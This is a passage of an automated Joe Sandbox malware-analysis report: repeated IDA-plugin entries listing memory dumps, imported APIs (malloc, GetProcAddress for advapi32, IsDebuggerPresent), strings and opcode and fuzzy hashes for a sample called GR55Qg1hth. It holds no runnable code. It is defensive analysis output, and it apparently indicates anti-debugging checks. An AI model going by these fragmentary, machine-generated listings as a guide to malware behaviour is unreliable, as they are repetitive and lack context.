                                                                    • Instruction Fuzzy Hash: E1312732609B06D2E7208F08F9953A977A0FB9474CF584225C2CC573A9CFBDD185C784
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 7dcd6fc6d72bc89a3e4675bab01651fd00278218ac2501f5bc83a76cfb358fde
                                                                    • Instruction ID: 701a507a9dc185df34a667128acbc1a579f5bb5ef113178a4139bad417d20cc2
                                                                    • Opcode Fuzzy Hash: 7dcd6fc6d72bc89a3e4675bab01651fd00278218ac2501f5bc83a76cfb358fde
                                                                    • Instruction Fuzzy Hash: 3E21387260AB02D2E7208F05E9953A977B0FB9474CF684225D2CC573A9CFBDD585C784
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 85375dfcd5daaca7365465e864f65e2932d63de1b128858e64a3808f6652b8ff
                                                                    • Instruction ID: ed43c67961c49e224be3e90e82dafe2c8453748c835b4e66eb15aedba24de53a
                                                                    • Opcode Fuzzy Hash: 85375dfcd5daaca7365465e864f65e2932d63de1b128858e64a3808f6652b8ff
                                                                    • Instruction Fuzzy Hash: 54216772A0AB02D2E7208F04E9813A977B0FB94748F684225C2CC973A8CF7DD485C784
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 8b30c82f902245f141f837a484b08c98957fd8fb09d85b8d6eb2dca5a0841dc0
                                                                    • Instruction ID: 7c75dd1c7ea3af51eb9251f09790412acf4d02e28e6ad0d40fd204c8e1536e84
                                                                    • Opcode Fuzzy Hash: 8b30c82f902245f141f837a484b08c98957fd8fb09d85b8d6eb2dca5a0841dc0
                                                                    • Instruction Fuzzy Hash: B4115872A0AB02D2E7208F04E9903A977B1FB94748F695235C28C973A9DF7CD485C784
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 8bfdd44bb474614054ef37fbc4d65ff322587115e31b71843af00833fb31a8b0
                                                                    • Instruction ID: 2dcf39b1a55f75ac57ef4703ba9653ce43967407f907d0b6200ec9c4a2b2e33a
                                                                    • Opcode Fuzzy Hash: 8bfdd44bb474614054ef37fbc4d65ff322587115e31b71843af00833fb31a8b0
                                                                    • Instruction Fuzzy Hash: 59115E72A09B02D2E7208F14E9803A977F1FB94748F695135C28C973A8DF7CD485C744
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 61f943b436e5bd69350d863be3fa5a5c575bfcf17c0e53ef99456b7fbe83ab4c
                                                                    • Instruction ID: b784999dda4a16cd060a9ddcc581a38c91aec0da0d4c06581dfce71173eb2c39
                                                                    • Opcode Fuzzy Hash: 61f943b436e5bd69350d863be3fa5a5c575bfcf17c0e53ef99456b7fbe83ab4c
                                                                    • Instruction Fuzzy Hash: B2115B72A0AB02D2E724CF14E9803A977B1FB94748F699135C28C973A8DF7CE495C784
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID:
                                                                    • API String ID: 2803490479-0
                                                                    • Opcode ID: 00e646be98459c525c89ed753d74ee293176d6fc02acd177718a1669a59afb10
                                                                    • Instruction ID: a70f0688066395c4bfcec2c44a82a555b543d26e8809a540c87d2197419988ca
                                                                    • Opcode Fuzzy Hash: 00e646be98459c525c89ed753d74ee293176d6fc02acd177718a1669a59afb10
                                                                    • Instruction Fuzzy Hash: 4E115B72A09B02D2E7148F14E9803A936A1FB84748F699135C28CA7398DF7CE495C794
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                    • API String ID: 384173800-4041758303
                                                                    • Opcode ID: c014e3c1f0149275a499bc7eb12d30e85ab0ea5a766f2352989478e0542848d7
                                                                    • Instruction ID: 81788e7c32a7cd7789d1105849ef145d1da071059a60a3d18aa63f033a4d7429
                                                                    • Opcode Fuzzy Hash: c014e3c1f0149275a499bc7eb12d30e85ab0ea5a766f2352989478e0542848d7
                                                                    • Instruction Fuzzy Hash: 29F0FF30A1AA03F2EE04DB52F89007833A0BF49754B8C0536CC4DE2720EF2CE04AC750
                                                                    APIs
                                                                    Strings
                                                                    • aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa, xrefs: 00007FF650236CA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: DebuggerErrorFormatLastMessagePresent
                                                                    • String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa
                                                                    • API String ID: 2392558662-3677204743
                                                                    • Opcode ID: be2adff4325a9ba8b389cc48a9f255d462b001eddb820bc02b9914a7b4603ae5
                                                                    • Instruction ID: e3e41b7c9507bc80c02d6a50a99a2344ca6a26824002e8b3b3d5750e827f2d20
                                                                    • Opcode Fuzzy Hash: be2adff4325a9ba8b389cc48a9f255d462b001eddb820bc02b9914a7b4603ae5
                                                                    • Instruction Fuzzy Hash: 97016D31B2CA03A1E6908B25B8483792664FF88B84F4C9435DE8DE2764EF3CD044CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fea090ce818f0d9776ffb852996240fddca4b87a8f0fa3a13f7abd970654801a
                                                                    • Instruction ID: 251f1bfe935119c819cb421e463caa53f1ee986e0247895d1fa6a7a4f0677339
                                                                    • Opcode Fuzzy Hash: fea090ce818f0d9776ffb852996240fddca4b87a8f0fa3a13f7abd970654801a
                                                                    • Instruction Fuzzy Hash: F812E53291C7C3A1E7118B69E9057A96BA0FF95794F488231EE8CA3796EF7DD044C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemsetstrlen
                                                                    • String ID: basic_string::_M_replace_aux
                                                                    • API String ID: 160209724-2536181960
                                                                    • Opcode ID: cd175613186f1afa88b687f92d444d844def170a5b7d7d54e9ba5aa8aa7679e5
                                                                    • Instruction ID: 12eab0b15ebde2278b7ac867c8fee8604a82259e8ee5f4cdc83ed128396ddcb4
                                                                    • Opcode Fuzzy Hash: cd175613186f1afa88b687f92d444d844def170a5b7d7d54e9ba5aa8aa7679e5
                                                                    • Instruction Fuzzy Hash: C6113633F591A670E816AB6B7E014E956102B9AFF4E9C4231EE5C6BB85DC3CD583C300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                                                                    • API String ID: 3510742995-2669816585
                                                                    • Opcode ID: 3622ddfe3dd2ce5dcf7d1f97ab951fcf58ce9926efb4232fe499f17666db3358
                                                                    • Instruction ID: c2de466430d557961aa92eb385fa3c63a25216fb607df7048b0f9892f5742c8a
                                                                    • Opcode Fuzzy Hash: 3622ddfe3dd2ce5dcf7d1f97ab951fcf58ce9926efb4232fe499f17666db3358
                                                                    • Instruction Fuzzy Hash: 3BF062B6E05A86A1E610AF61D8010A8A761F759F88F884122DA4C63325DE3CD556C704
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                                                                    • API String ID: 3510742995-2669816585
                                                                    • Opcode ID: c1754d6dee14f81dc3763cd0d6fd8a9b6bad5cabb0c735fe84781a88c55a56ee
                                                                    • Instruction ID: 94fe2052028b1f105e1a0f70f6633c9ba910e78936725c9328329e79aea6ae16
                                                                    • Opcode Fuzzy Hash: c1754d6dee14f81dc3763cd0d6fd8a9b6bad5cabb0c735fe84781a88c55a56ee
                                                                    • Instruction Fuzzy Hash: 4CF09076F04B86A1E600AF65D8414A8A720F799F84FCD4532EE8C63325DF3CD596C704
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
                                                                    • API String ID: 0-3532027576
                                                                    • Opcode ID: 65f2cf0798e95a115fec83cb8f205f6db6aeb3e378b199a61e3594a55d741aee
                                                                    • Instruction ID: 4f4f88e9474598509b4b1636ecbaf323ae2b10554648511c5cb96193ccc8565e
                                                                    • Opcode Fuzzy Hash: 65f2cf0798e95a115fec83cb8f205f6db6aeb3e378b199a61e3594a55d741aee
                                                                    • Instruction Fuzzy Hash: 69F0E262B04B4BA1EE00DFAAE0904B96320FB65BC4B982432DA0DA7310EE7CE185C344
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CaptureContextUnwindabortmalloc
                                                                    • String ID: basic_string::_M_create
                                                                    • API String ID: 214865124-3122258987
                                                                    • Opcode ID: 51bbe19fb507b71583be21cb408ad92cfffb69ad199a4023d00682e8b30e8fe1
                                                                    • Instruction ID: 2f6e487a65ea8edc7137a6b28cd6bb568a5f9dfcaf605b365766b515cc1df11c
                                                                    • Opcode Fuzzy Hash: 51bbe19fb507b71583be21cb408ad92cfffb69ad199a4023d00682e8b30e8fe1
